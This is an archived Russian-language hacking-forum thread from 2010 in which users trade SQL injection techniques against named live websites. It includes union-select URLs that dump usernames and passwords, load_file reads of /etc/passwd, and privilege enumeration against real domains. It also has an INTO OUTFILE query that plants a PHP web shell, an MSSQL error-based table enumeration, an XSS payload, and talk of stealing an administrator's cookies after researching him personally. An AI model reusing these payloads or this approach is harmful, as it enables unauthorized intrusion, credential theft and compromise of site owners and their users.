Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.03.2010, 20:51
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от scorpic393
Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
PHP код:
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>
PHP код:
<?php
...
if(isset($_GET['type']))
{
$response=mysql_query("SELECT count(*) FROM news WHERE type='".$_GET['type']."'");
$result=mysql_fetch_array($response);
}
...
?>
|
|
|
07.03.2010, 21:31
|
|
Новичок
Регистрация: 24.12.2008
Сообщений: 12
Провел на форуме:
32210
Репутация:
1
|
|
Люди, подскажите, есть доступ к mysql , рутовский как бы.
но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';
но не могу найти папку с правами на залив.
что делать?
|
|
|
|
07.03.2010, 21:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от navai
Люди, подскажите, есть доступ к mysql , рутовский как бы.
но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';
но не могу найти папку с правами на залив.
что делать?
http://tinyurl.com/yb2gm96
|
|
|
|
07.03.2010, 23:53
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258
Репутация:
5
|
|
Почему не логиниться???
http://www.sflcn.com/admin
выдрал логин пасс
http://www.sflcn.com/story.php?id=-8069+union+select+1,2,group_concat%28username,0x3a ,userpassword%29,4,5,6,7,8+from+users
Попробуйте плиз. может у меня руки кривые |
|
|
|
08.03.2010, 01:25
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
2 scorpic393
во-первых, не всегда данные из таблицы подойдут к админке( мб просто данные для входа в нее в другой таблице ) , во-вторых, в данном случае на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
|
|
|
|
08.03.2010, 01:40
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
90%?)) имхо ты ошибаешся
|
|
|
|
08.03.2010, 12:18
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183
Репутация:
13
|
|
Вот таким образом выводится нужные мне значения но по одному, меняя лимит
UNION SELECT * FROM(SELECT * FROM (SELECT NAME_CONST((SELECT password FROM user LIMIT 1), 14)d) as t JOIN(SELECT NAME_CONST((SELECT password FROM user LIMIT 1),14)e)b)a
Каким образом можно вывести весь список сразу? intooutfile доступ запрещён для этого юзверя.
|
|
|
|
09.03.2010, 01:35
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
Провел на форуме:
750247
Репутация:
92
|
|
Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
.
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Çàïðîñ_Ñòàäèè_Êëèåíò' to a column of data type int.
Подставляю это значение в запрос
1 or 1=(select top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama','Çàïðîñ_Ñòàäèè_Êëèåíò'))
Получаю тоже самое.
Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста. |
|
|
|
09.03.2010, 02:43
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681
Репутация:
0
|
|
Здрасти!
Возникла проблема которую не могу решить даже после прочтения етого треда,множества FAQ по sql inj, sql cheat sheet'ов, мануалов, статей в Хакере и всего подобного.
Вообщем дело обстоит так:
inj:
http://enjoy.md/category.php?id=2%27] http://enjoy.md/category.php?id=2'
Доступ к БД осуществил, вытянуть удалось лишь логины и пассы пользователей сайта, найти логин и пасс админа в этой БД не удалось. В user_privileges - privilege_type-usage и is_grantable-no:
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,grantee,privilege_type ,is_grantable%29+from+information_schema.user_priv ileges--
load_file выдает пустую страницу(что в hex, что в текст, что с aes_decrypt(aes_encrypt)):
http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27etc/passwd%27%29,3--+
http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27home/vhosts/enjoy.md/public_html/index.php%27%29,3--+
инфа:
version() - 5.1.37 mysql
user()- '20121'@'localhost'
database() - 20121_enjoy
ещё нашел адмику:
http://enjoy.md/admin/
и PMA:
http://enjoy.md/phpmyadmin
что интересно, вовсяком случае мне так показалось, так ето вот:
http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,table_schema+from+information_schema.tables+wh ere+table_name=%27admin%27--
Не могу понять откуда эти БД взялись если при таком запросе их не видно:
http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,schema_name+from+information_schema.schemata--
Подключитьсяк ним никак не могу,есть ли способ и гдеж логин и пасс админа хранится тогда? в PMA и админке обойти авторизацию не вышло.
Помогите додумать это плз, может совет какой дадите.
На данный момент приходит в голову лишь кража кукисов, на сайте есть мыло и icq, с их помощью узнал ФИО админа,место работы, сделанные им сайты. Не приятно признавать но не охото мне с кукисами морочиться если есть другие варьянты дайте знать 
SiXSS(alert):
http://enjoy.md/category.php?id=-2/**/union/**/select+1,2,0x3c7363726970743e616c657274282256756c6 e65726162696c69747922293b3c2f7363726970743e%20--
Это может выглядить глупо но всё же:
http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+
значит всё же file_priv=Y? если я чёт намудрил плз исправьте
доступа к file_priv непсредственно из mysql.users нету,даёт ошибку, как впрочем и к самой БД mysql:
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,file_priv+from+mysql.users--
еще вопрос, почему пишет privilege_type-select is_grantable-no? Я же вовсю им орудую. Или это отнсится лишь к БД и их выбору?
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,privilege_type,is_gran table%29+from+information_schema.schema_privileges--
надеюсь я ниче не перепутал спс!
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
т.к. в моём случае заливка шелла не возможна по всей видимость просто прошу обьяснить какой именно путь указать при load_file |
|
|
|
09.03.2010, 03:32
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
overcrookd в user есть
login:admin
password:666 может это и есть то самое?
п.с ток всеравно логин иле pwd не подходит
Последний раз редактировалось [Feldmarschall]; 09.03.2010 в 03:39..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1961627){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1965481){kind=avatar}
Похожие темы
Линейный вид
